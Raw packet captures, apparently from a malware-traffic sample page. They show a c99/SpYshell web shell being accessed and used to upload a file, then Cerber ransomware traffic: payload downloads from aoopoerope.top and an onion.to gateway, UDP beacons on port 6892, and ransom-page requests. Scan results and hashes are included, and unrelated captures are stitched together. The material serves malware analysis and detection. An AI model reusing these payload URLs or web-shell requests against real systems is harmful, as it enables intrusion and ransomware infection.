2017-01-20 03:22:31.946998 IP 192.168.1.102.54059 > 192.168.1.100.55555: Flags [P.], seq 1:400, ack 1, win 2053, length 399
E…..@…Zr…f…d.+….:[.~..P…g=..GET /c99.php?ry4wn[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:31.947013 IP 192.168.1.100.55555 > 192.168.1.102.54059: Flags [.], ack 400, win 237, length 0
E..(.@@.@..u…d…f…+.~….;.P….5..
2017-01-20 03:22:31.952320 IP 192.168.1.100.55555 > 192.168.1.102.54059: Flags [P.], seq 1:5601, ack 400, win 237, length 5600
E….A@.@……d…f…+.~….;.P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 08:22:31 GMT
Server: Apache/2.4.18 (Debian)
Zamani: Mon, 12 May 2005 03:00:00 GMT
Son Modifiye: Fri, 20 Jan 2017 08:22:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pratik: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 5151
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 03:22:31.983921 IP 192.168.1.102.54062 > 192.168.1.100.55555: Flags [P.], seq 1:384, ack 1, win 2053, length 383
E…..@…Zq…f…d…..s/p…@P….[..GET /c99.php?act=img&img=up HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: image/webp,image/*,*/*;q=0.8
Referer: http://192.168.1.100:55555/c99.php?ry4wn[login]=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:31.983929 IP 192.168.1.100.55555 > 192.168.1.102.54062: Flags [.], ack 384, win 237, length 0
E..(&.@.@……d…f…….@.s0.P….5..
2017-01-20 03:22:31.984218 IP 192.168.1.100.55555 > 192.168.1.102.54062: Flags [P.], seq 1:327, ack 384, win 237, length 326
E..n&.@.@..z…d…f…….@.s0.P….{..HTTP/1.0 401 Yetkisiz
Date: Fri, 20 Jan 2017 08:22:31 GMT
Server: Apache/2.4.18 (Debian)
WWW-Belgele: Basic realm=”SpYshell KingDefacer: Restricted area”
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<a href=”http://xxxxxxxxxxxxxxxxxxxxxxxx”>SpYshell v.KingDefacer</a>: Erisim Engellendi

2017-01-20 03:22:56.211184 IP 192.168.1.102.54114 > 192.168.1.100.55555: Flags [P.], seq 1:624, ack 1, win 2053, length 623
E…..@…X….f…d.b……..E<P…x=..POST /c99.php?ry4wn[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 39127
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryLoRtloEXoMSV9bhy
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/c99.php?ry4wn[login]=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:56.211200 IP 192.168.1.100.55555 > 192.168.1.102.54114: Flags [.], ack 624, win 238, length 0
E..(.`@.@..T…d…f…b..E<…7P….5..
2017-01-20 03:22:56.211450 IP 192.168.1.102.54114 > 192.168.1.100.55555: Flags [.], seq 624:5004, ack 1, win 2053, length 4380
E..D..@…I….f…d.b…..7..E<P….Q..——WebKitFormBoundaryLoRtloEXoMSV9bhy
Content-Disposition: form-data; name=”act”

upload
——WebKitFormBoundaryLoRtloEXoMSV9bhy
Content-Disposition: form-data; name=”uploadfile”; filename=”logo.png”
Content-Type: image/png

.PNG

Cerber Ransomware Trojan Malware read.php aoopoerope.top Traffic Analysis Full PCAP File Download

SHA256: edf9fd11f47c914459f673a5c635801208c14217a6d714f6b60b7ce4b62e54d8
File name: read.php
Detection ratio: 10 / 57
Analysis date: 2017-01-16 07:37:11 UTC ( 0 minutes ago )
AhnLab-V3 Trojan/Win32.Cerber.C1748597 20170116
Avast Win32:Malware-gen 20170116
Avira (no cloud) TR/Crypt.Xpack.amsqc 20170116
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9985 20170116
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
ESET-NOD32 a variant of Win32/Injector.DJVO 20170116
Invincea worm.win32.kasidet.f 20170111
Kaspersky UDS:DangerousObject.Multi.Generic 20170116
Qihoo-360 HEUR/QVM42.0.0000.Malware.Gen 20170116
Rising Malware.Generic!YNz7NgPxwWG@1 (thunder) 20170116

 

2017-01-15 23:39:23.889013 IP 192.168.1.102.62841 > 35.161.229.79.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..M=.@….}…f#..O.y.P.8..2>..P…>…GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoopoerope.top
Connection: Keep-Alive

2017-01-15 23:41:05.390291 IP 192.168.1.102.63001 > 23.34.0.137.80: Flags [P.], seq 0:276, ack 1, win 256, length 276: HTTP: GET /pkiops/crl/MicWinProPCA2011_2011-10-19.crl HTTP/1.1
E..<Eq@……..f.”…..Pd……DP…+…GET /pkiops/crl/MicWinProPCA2011_2011-10-19.crl HTTP/1.1
Cache-Control: max-age = 393
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 26 Dec 2016 06:01:59 GMT
If-None-Match: “e6d8ca913d5fd21:0”
User-Agent: Microsoft-CryptoAPI/10.0
Host: www.microsoft.com
2017-01-15 23:41:05.467921 IP 192.168.1.102.63001 > 23.34.0.137.80: Flags [.], ack 249, win 255, length 0
E..(Er@……..f.”…..Pd……<P….s……..
2017-01-15 23:41:23.387074 IP 192.168.1.102.55397 > 90.2.1.0.6892: UDP, length 25
E..5.8…..p…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387125 IP 192.168.1.102.55397 > 90.2.1.1.6892: UDP, length 25
E..5D……$…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387248 IP 192.168.1.102.55397 > 90.2.1.2.6892: UDP, length 25
E..5,……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387255 IP 192.168.1.102.55397 > 90.2.1.3.6892: UDP, length 25
E..5c`…..D…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387310 IP 192.168.1.102.55397 > 90.2.1.4.6892: UDP, length 25
E..5X……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387380 IP 192.168.1.102.55397 > 90.2.1.5.6892: UDP, length 25
E..5.t…../…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387436 IP 192.168.1.102.55397 > 90.2.1.6.6892: UDP, length 25
E..5………..fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387442 IP 192.168.1.102.55397 > 90.2.1.7.6892: UDP, length 25
E..50……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387537 IP 192.168.1.102.55397 > 90.2.1.8.6892: UDP, length 25
E..5b……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387543 IP 192.168.1.102.55397 > 90.2.1.9.6892: UDP, length 25
E..5-……….fZ.. .e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387608 IP 192.168.1.102.55397 > 90.2.1.10.6892: UDP, length 25
E..5E……….fZ..
.e…!..c9e537574920044695010008c

2017-01-15 23:41:23.390149 IP 192.168.1.102.55397 > 91.239.24.2.6892: UDP, length 25
E..5bM…..k…f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390153 IP 192.168.1.102.55397 > 91.239.24.3.6892: UDP, length 25
E..5-……….f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390201 IP 192.168.1.102.55397 > 91.239.24.4.6892: UDP, length 25
E..5.}…..9…f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390279 IP 192.168.1.102.55397 > 91.239.24.5.6892: UDP, length 25
E..5Y……….f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390329 IP 192.168.1.102.55397 > 91.239.24.6.6892: UDP, length 25
E..51……     …f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390332 IP 192.168.1.102.55397 > 91.239.24.7.6892: UDP, length 25
E..5~#………f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390381 IP 192.168.1.102.55397 > 91.239.24.8.6892: UDP, length 25
E..5,h…..J…f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390456 IP 192.168.1.102.55397 > 91.239.24.9.6892: UDP, length 25
E..5c……….f[..     .e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390506 IP 192.168.1.102.55397 > 91.239.24.10.6892: UDP, length 25
E..5………..f[..
.e…!..c9e537574920044695010008c

2017-01-15 23:44:55.252080 IP 192.168.1.102.59606 > 90.2.1.12.6892: UDP, length 14
E..*1M…..Y…fZ……….7c9e5375749203e….
2017-01-15 23:44:55.252142 IP 192.168.1.102.59606 > 90.2.1.13.6892: UDP, length 14
E..*~……….fZ……….6c9e5375749203e….
2017-01-15 23:44:55.252193 IP 192.168.1.102.59606 > 90.2.1.14.6892: UDP, length 14
E..*.+…..z…fZ……….5c9e5375749203e….
2017-01-15 23:44:55.252197 IP 192.168.1.102.59606 > 90.2.1.15.6892: UDP, length 14
E..*Ys…..0…fZ……….4c9e5375749203e….
2017-01-15 23:44:55.252243 IP 192.168.1.102.59606 > 90.2.1.16.6892: UDP, length 14
E..*?……….fZ……….3c9e5375749203e….
2017-01-15 23:44:55.252330 IP 192.168.1.102.59606 > 90.2.1.17.6892: UDP, length 14
E..*p……….fZ……….2c9e5375749203e….
2017-01-15 23:44:55.252380 IP 192.168.1.102.59606 > 90.2.1.18.6892: UDP, length 14
E..*.Q…..P…fZ……….1c9e5375749203e….
2017-01-15 23:44:55.252383 IP 192.168.1.102.59606 > 90.2.1.19.6892: UDP, length 14
E..*W……….fZ……….0c9e5375749203e….
2017-01-15 23:44:55.252432 IP 192.168.1.102.59606 > 90.2.1.20.6892: UDP, length 14
E..*la…..=…fZ………./c9e5375749203e….
2017-01-15 23:44:55.252512 IP 192.168.1.102.59606 > 90.2.1.21.6892: UDP, length 14
E..*#……….fZ………..c9e5375749203e….
2017-01-15 23:44:55.252562 IP 192.168.1.102.59606 > 90.2.1.22.6892: UDP, length 14
E..*L’…..u…fZ……….-c9e5375749203e….
2017-01-15 23:44:55.252612 IP 192.168.1.102.59606 > 90.2.1.23.6892: UDP, length 14
E..*………..fZ……….,c9e5375749203e….
2017-01-15 23:44:55.252615 IP 192.168.1.102.59606 > 90.2.1.24.6892: UDP, length 14
E..*Vl………fZ……….+c9e5375749203e….
2017-01-15 23:44:55.252696 IP 192.168.1.102.59606 > 90.2.1.25.6892: UDP, length 14
E..*………..fZ……….*c9e5375749203e….
2017-01-15 23:44:55.252747 IP 192.168.1.102.59606 > 90.2.1.26.6892: UDP, length 14
E..*r”…..v…fZ……….)c9e5375749203e….
2017-01-15 23:44:55.252750 IP 192.168.1.102.59606 > 90.2.1.27.6892: UDP, length 14
E..*>……….fZ……….(c9e5375749203e….
2017-01-15 23:44:55.252797 IP 192.168.1.102.59606 > 90.2.1.28.6892: UDP, length 14
E..*………..fZ……….’c9e5375749203e….

2017-01-15 23:44:55.254495 IP 192.168.1.102.59606 > 91.239.24.0.6892: UDP, length 14
E..*G……….f[……….Uc9e5375749203e….
2017-01-15 23:44:55.254499 IP 192.168.1.102.59606 > 91.239.24.1.6892: UDP, length 14
E..*./………f[……….Tc9e5375749203e….
2017-01-15 23:44:55.254549 IP 192.168.1.102.59606 > 91.239.24.2.6892: UDP, length 14
E..*dM…..v…f[……….Sc9e5375749203e….
2017-01-15 23:44:55.254629 IP 192.168.1.102.59606 > 91.239.24.3.6892: UDP, length 14
E..*/……….f[……….Rc9e5375749203e….
2017-01-15 23:44:55.254679 IP 192.168.1.102.59606 > 91.239.24.4.6892: UDP, length 14
E..*.}…..D…f[……….Qc9e5375749203e….
2017-01-15 23:44:55.254683 IP 192.168.1.102.59606 > 91.239.24.5.6892: UDP, length 14
E..*[……….f[……….Pc9e5375749203e….
2017-01-15 23:44:55.254733 IP 192.168.1.102.59606 > 91.239.24.6.6892: UDP, length 14
E..*3……….f[……….Oc9e5375749203e….
2017-01-15 23:44:55.254810 IP 192.168.1.102.59606 > 91.239.24.7.6892: UDP, length 14
E..*.#………f[……….Nc9e5375749203e….
2017-01-15 23:44:55.254862 IP 192.168.1.102.59606 > 91.239.24.8.6892: UDP, length 14
E..*.h…..U…f[……….Mc9e5375749203e….
2017-01-15 23:44:55.254866 IP 192.168.1.102.59606 > 91.239.24.9.6892: UDP, length 14
E..*e……….f[..     …….Lc9e5375749203e….
2017-01-15 23:44:55.254916 IP 192.168.1.102.59606 > 91.239.24.10.6892: UDP, length 14

2017-01-15 23:46:39.295958 IP 192.168.1.102.63049 > 52.85.130.113.443: Flags [P.], seq 5186:5635, ack 7564, win 253, length 449
E…+.@…U3…f4U.q.I..N(….j.P…………..[e.o.zD..v…..a..m(j..Q…$.<.aN.Q}.yP5.$.3.1..Q
.]i..4n..7C….`…d..y….2″………R…[…..u@.@CZ..2.T…..1…..nH..(l..{…t&..thcIS..@…G{…n@&..=@………….%..O….0..R………..,….|…..he.5s.6….7/.-     ..6/m.\……Dl….5.*gH..o.C.7XY.#..vr.OG..v(…J1.y{p..2.S.#..R……>……….O…lT<.:Jx..]………….=..%ZT…..t..Fh..j.(……?~k.F.. .J4 ..r.q.b9}.sK.I.j#.%l…c.~..x….L…..B.5II..qm)……._f..
…2.j}<…
2017-01-15 23:46:39.651232 IP 192.168.1.102.63049 > 52.85.130.113.443: Flags [.], ack 8218, win 251, length 0
E..(+.@…V….f4U.q.I..N(….meP…[………
2017-01-15 23:46:50.493725 IP 192.168.1.102.50371 > 75.75.75.75.53: 60606+ A? download.mozilla.org. (38)
E..B.P………fKKKK…5……………..download.mozilla.org…..
2017-01-15 23:46:50.521505 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [S], seq 243451869, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4HD@……..f47…L.P………. ……………..
2017-01-15 23:46:50.523024 IP 192.168.1.102.50372 > 75.75.75.75.53: 4003+ A? bouncer-bouncer-elb.prod.mozaws.net. (53)
E..Q.Q………fKKKK…5.=……………bouncer-bouncer-elb.prod.mozaws.net…..
2017-01-15 23:46:50.547321 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [.], ack 2271199228, win 256, length 0
E..(HE@……..f47…L.P….._..P………….
2017-01-15 23:46:50.548854 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [P.], seq 0:335, ack 1, win 256, length 335: HTTP: GET /?product=firefox-48.0.2-complete&os=win&lang=en-US HTTP/1.1
E..wHF@….A…f47…L.P….._..P…….GET /?product=firefox-48.0.2-complete&os=win&lang=en-US HTTP/1.1
Host: download.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=6000000-6299999
Connection: keep-alive

2017-01-15 23:46:50.567181 IP 192.168.1.102.50373 > 75.75.75.75.53: 48273+ AAAA? bouncer-bouncer-elb.prod.mozaws.net. (53)
E..Q.R………fKKKK…5.=……………bouncer-bouncer-elb.prod.mozaws.net…..
2017-01-15 23:46:50.591241 IP 192.168.1.102.50374 > 75.75.75.75.53: 36531+ AAAA? bouncer-bouncer-elb.prod.mozaws.net.localdomain. (65)
E..].S………fKKKK…5.I.]………….bouncer-bouncer-elb.prod.mozaws.net.localdomain…..
2017-01-15 23:46:50.650505 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [.], ack 419, win 255, length 0
E..(HG@……..f47…L.P…-._..P………….
2017-01-15 23:46:50.853975 IP 192.168.1.102.50375 > 75.75.75.75.53: 44713+ A? download.cdn.mozilla.net. (42)
E..F.T………fKKKK…5.2.u………….download.cdn.mozilla.net…..
2017-01-15 23:46:50.880072 IP 192.168.1.102.50376 > 75.75.75.75.53: 19427+ A? a1284.dscg.akamai.net. (39)
E..C.U………fKKKK…5./.OK…………a1284.dscg.akamai.net…..
2017-01-15 23:46:51.120513 IP 192.168.1.102.50377 > 75.75.75.75.53: 44333+ AAAA? a1284.dscg.akamai.net. (39)
E..C.V………fKKKK…5./<..-………..a1284.dscg.akamai.net…..
2017-01-15 23:46:53.787836 IP 192.168.1.102.50378 > 75.75.75.75.53: 21950+ A? tiles.services.mozilla.com. (44)
E..H.W………fKKKK…5.4vXU…………tiles.services.mozilla.com…..
2017-01-15 23:46:53.789311 IP 192.168.1.102.50379 > 75.75.75.75.53: 27066+ A? p27dokhpz2n7nvgr.onion.to. (43)
E..G.X………fKKKK…5.3..i…………p27dokhpz2n7nvgr.onion.to…..
2017-01-15 23:46:53.818089 IP 192.168.1.102.50380 > 75.75.75.75.53: 17597+ A? tiles.r53-2.services.mozilla.com. (50)
E..N.Y………fKKKK…5.:.tD…………tiles.r53-2.services.mozilla.com…..
2017-01-15 23:46:53.818625 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [S], seq 1224485300, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4<z@……..f4X.<.N..H.)……. ……………..
2017-01-15 23:46:53.843879 IP 192.168.1.102.50381 > 75.75.75.75.53: 63520+ A? location.services.mozilla.com. (47)
E..K.Z………fKKKK…5.7… ………..location.services.mozilla.com…..
2017-01-15 23:46:53.851378 IP 192.168.1.102.50382 > 75.75.75.75.53: 34479+ AAAA? tiles.r53-2.services.mozilla.com. (50)
E..N.[………fKKKK…5.:.d………….tiles.r53-2.services.mozilla.com…..
2017-01-15 23:46:53.865576 IP 192.168.1.102.63055 > 52.18.124.61.443: Flags [S], seq 3497315147, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4    5@….1…f4.|=.O…t.K…… .H……………
2017-01-15 23:46:53.867029 IP 192.168.1.102.50383 > 75.75.75.75.53: 60980+ A? locprod1-elb-eu-west-1.prod.mozaws.net. (56)
E..T.\………fKKKK…5.@…4………..locprod1-elb-eu-west-1.prod.mozaws.net…..
2017-01-15 23:46:53.875338 IP 192.168.1.102.50384 > 75.75.75.75.53: 29643+ AAAA? tiles.r53-2.services.mozilla.com.localdomain. (62)
E..Z.]………fKKKK…5.Fu.s…………tiles.r53-2.services.mozilla.com.localdomain…..
2017-01-15 23:46:53.923208 IP 192.168.1.102.50385 > 75.75.75.75.53: 62983+ AAAA? locprod1-elb-eu-west-1.prod.mozaws.net. (56)
E..T.^………fKKKK…5.@……………locprod1-elb-eu-west-1.prod.mozaws.net…..
2017-01-15 23:46:53.947549 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [.], ack 2204531087, win 64240, length 0
E..(<{@……..f4X.<.N..H.)..fy.P…O………
2017-01-15 23:46:53.948324 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [P.], seq 0:208, ack 1, win 64240, length 208
E…<|@……..f4X.<.N..H.)..fy.P………………….,5,…`…..C.G..r.LCDr..”……+./…..
.       …..3.9./.5.
………….tiles.services.mozilla.com……….
……………..#..3t………h2.spdy/3.1.http/1.1……………………………..
2017-01-15 23:46:54.027002 IP 192.168.1.102.63055 > 52.18.124.61.443: Flags [.], ack 1980024688, win 256, length 0
E..(    6@….<…f4.|=.O…t.Lv..pP…k5……..
2017-01-15 23:46:54.027136 IP 192.168.1.102.50386 > 75.75.75.75.53: 65330+ AAAA? locprod1-elb-eu-west-1.prod.mozaws.net.localdomain. (68)
E..`._………fKKKK…5.L]..2………..locprod1-elb-eu-west-1.prod.mozaws.net.localdomain…..

2017-01-15 23:46:54.245185 IP 192.168.1.102.63057 > 185.100.85.150.80: Flags [.], ack 1796123072, win 256, length 0
E..(NX@….n…f.dU..Q.Pf`..k…P….r……..
2017-01-15 23:46:54.245877 IP 192.168.1.102.63057 > 185.100.85.150.80: Flags [P.], seq 0:316, ack 1, win 256, length 316: HTTP: GET /C9E5-3757-4920-0446-96CD HTTP/1.1
E..dNY@….1…f.dU..Q.Pf`..k…P….}..GET /C9E5-3757-4920-0446-96CD HTTP/1.1
Host: p27dokhpz2n7nvgr.onion.to
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2017-01-15 23:46:54.654433 IP 192.168.1.102.63058 > 185.100.85.150.443: Flags [P.], seq 0:207, ack 1, win 256, length 207
E…N^@……..f.dU..R…SL..D..P………………4..”…..M.-…..\…8…..^..8…..+./…..
.       …..3.9./.5.
………….p27dokhpz2n7nvgr.onion.to……….
……………..#..3t………h2.spdy/3.1.http/1.1……………………………..
2017-01-15 23:46:54.675502 IP 192.168.1.102.50393 > 75.75.75.75.53: 64425+ A? tiles-cloudfront.cdn.mozilla.net. (50)
E..N.f………fKKKK…5.:C…………..tiles-cloudfront.cdn.mozilla.net…..
2017-01-15 23:46:54.691829 IP 192.168.1.102.50394 > 75.75.75.75.53: 3950+ A? search.services.mozilla.com. (45)
E..I.g………fKKKK…5.5…n………..search.services.mozilla.com…..
2017-01-15 23:46:54.698859 IP 192.168.1.102.63063 > 52.85.142.171.443: Flags [S], seq 3527399029, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4I.@…+….f4U…W…?.u…… .)9…………..
2017-01-15 23:46:54.700308 IP 192.168.1.102.50395 > 75.75.75.75.53: 4361+ A? dcky6u1m8u6el.cloudfront.net. (46)
E..J.h………fKKKK…5.6.-.   ………..dcky6u1m8u6el
cloudfront.net…..
2017-01-15 23:46:54.716052 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [.], ack 3514, win 63687, length 0
E..(<.@……..f4X.<.N..H.,..f.HP…A0……..
2017-01-15 23:46:54.726857 IP 192.168.1.102.63063 > 52.85.142.171.443: Flags [.], ack 2078486373, win 256, length 0
E..(I.@…+….f4U…W…?.v{./eP………….
2017-01-15 23:46:54.732133 IP 192.168.1.102.63063 > 52.85.142.171.443: Flags [P.], seq 0:214, ack 1, win 256, length 214
E…I.@…+….f4U…W…?.v{./eP….e…………..g…-……L.Q’….>.2.go.!..a…..+./…..
.       …..3.9./.5.
…….%.#.. tiles-cloudfront.cdn.mozilla.net……….
……………..#..3t………h2.spdy/3.1.http/1.1……………………………..
2017-01-15 23:46:54.733632 IP 192.168.1.102.63055 > 52.18.124.61.443: Flags [.], ack 3342, win 254, length 0
E..(    <@….6…f4.|=.O…t.Ov..}P…[‘……..
2017-01-15 23:46:54.745274 IP 192.168.1.102.63064 > 52.36.246.167.443: Flags [S], seq 3053522528, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.w@….r…f4$…X…..`…… ……………..
2017-01-15 23:46:54.751550 IP 192.168.1.102.50396 > 75.75.75.75.53: 5442+ A? search.r53-2.services.mozilla.com. (51)
E..O.i………fKKKK…5.;7..B………..search.r53-2.services.mozilla.com…..
2017-01-15 23:46:54.752640 IP 192.168.1.102.50397 > 75.75.75.75.53: 60237+ AAAA? dcky6u1m8u6el.cloudfront.net. (46)
E..J.j………fKKKK…5.65..M………..dcky6u1m8u6el

2017-01-15 23:47:54.184861 IP 192.168.1.102.60652 > 75.75.75.75.53: 60795+ A? ciscobinary.openh264.org. (42)
E..F…….r…fKKKK…5.2…{………..ciscobinary.openh264.org…..
2017-01-15 23:47:54.204808 IP 192.168.1.102.63093 > 35.161.49.209.443: Flags [.], ack 3885, win 63271, length 0
E..(s.@…o….f#.1..u…c.QM…P..’U………
2017-01-15 23:47:54.217320 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [S], seq 2406696465, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.4@…X!…f.. b.v.P.sF……. ..U…………..
2017-01-15 23:47:54.230029 IP 192.168.1.102.60653 > 75.75.75.75.53: 19381+ A? a19.dscg10.akamai.net. (39)
E..C…….t…fKKKK…5./.TK…………a19.dscg10.akamai.net…..
2017-01-15 23:47:54.250576 IP 192.168.1.102.60654 > 75.75.75.75.53: 43727+ AAAA? a19.dscg10.akamai.net. (39)
E..C…….s…fKKKK…5./.9………….a19.dscg10.akamai.net…..
2017-01-15 23:47:54.258223 IP 192.168.1.102.63091 > 50.112.150.136.443: Flags [.], ack 3656, win 253, length 0
E..(>?@…1….f2p…s..YF..4*YvP…&………
2017-01-15 23:47:54.288833 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [.], ack 1515896577, win 256, length 0
E..(.5@…X,…f.. b.v.P.sF.ZZ..P…@………
2017-01-15 23:47:54.290361 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [P.], seq 0:449, ack 1, win 256, length 449: HTTP: GET /openh264-win32-0410d336bb748149a4f560eb6108090f078254b1.zip HTTP/1.1
E….6@…Vj…f.. b.v.P.sF.ZZ..P…….GET /openh264-win32-0410d336bb748149a4f560eb6108090f078254b1.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-Modified-Since: Tue, 02 Aug 2016 18:34:14 GMT
If-None-Match: ac4fcf1b56303959919767d33473cbb9

Cerber Zerber Ransomware Trojan Malware oamnohndpiwpicgm.onion.to 194.165.16.* UDP C2 PCAP File Download Traffic Sample

SHA256: 7dd82320953cc4257259ec4bba37ee6485493d49ac35428918ea4a0d36988cd9
File name: 63b873380be779512d2ff1acdc2cc063.dat
Detection ratio: 40 / 55
Analysis date: 2017-01-16 07:28:17 UTC ( 0 minutes ago )
AegisLab Troj.Ransom.W32.Zerber!c 20170116
AhnLab-V3 Trojan/Win32.Cerber.R191828 20170116
Arcabit Trojan.Generic.D3B3C08 20170116
Avast Win32:Trojan-gen 20170116
Avira (no cloud) TR/Crypt.Xpack.ptihk 20170116
BitDefender Trojan.GenericKD.3881992 20170116
Bkav HW32.Packed.D860 20170114
CAT-QuickHeal Ransom.Cerber.B 20170116
CrowdStrike Falcon (ML) malicious_confidence_82% (W) 20161024
Cyren W32/Trojan.TLPW-4766 20170116
DrWeb Trojan.Encoder.7233 20170116
ESET-NOD32 NSIS/Injector.MM 20170116
Emsisoft Trojan-Ransom.Cerber (A) 20170116

2017-01-15 23:24:56.595989 IP 192.168.1.102.62740 > 192.36.27.5.80: Flags [P.], seq 0:331, ack 1, win 256, length 331: HTTP: GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
E..sf.@….6…f.$…..P…..#~rP…….GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: oamnohndpiwpicgm.onion.to
Connection: Keep-Alive

2017-01-15 23:25:05.181614 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [P.], seq 0:240, ack 1, win 256, length 240: HTTP: GET /fwlink/?LinkId=57426&Ext=dat HTTP/1.1
E…L.@……..f.@J….P<…a..*P…….GET /fwlink/?LinkId=57426&Ext=dat HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: go.microsoft.com
Connection: Keep-Alive

2017-01-15 23:25:05.264474 IP 192.168.1.102.56837 > 75.75.75.75.53: 15743+ A? shell.windows.com. (35)
E..?………..fKKKK…5.+.Z=…………shell.windows.com…..
2017-01-15 23:25:05.280898 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [.], ack 344, win 255, length 0
E..(L.@….w…f.@J….P<…a…P…i………
2017-01-15 23:25:05.523123 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [.], ack 345, win 255, length 0
E..(L   @….v…f.@J….P<…a…P…i………
2017-01-15 23:25:10.559228 IP 192.168.1.102.62740 > 192.36.27.5.80: Flags [P.], seq 331:662, ack 145, win 256, length 331: HTTP: GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
E..sf{@……..f.$…..P…2.#..P….<..GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
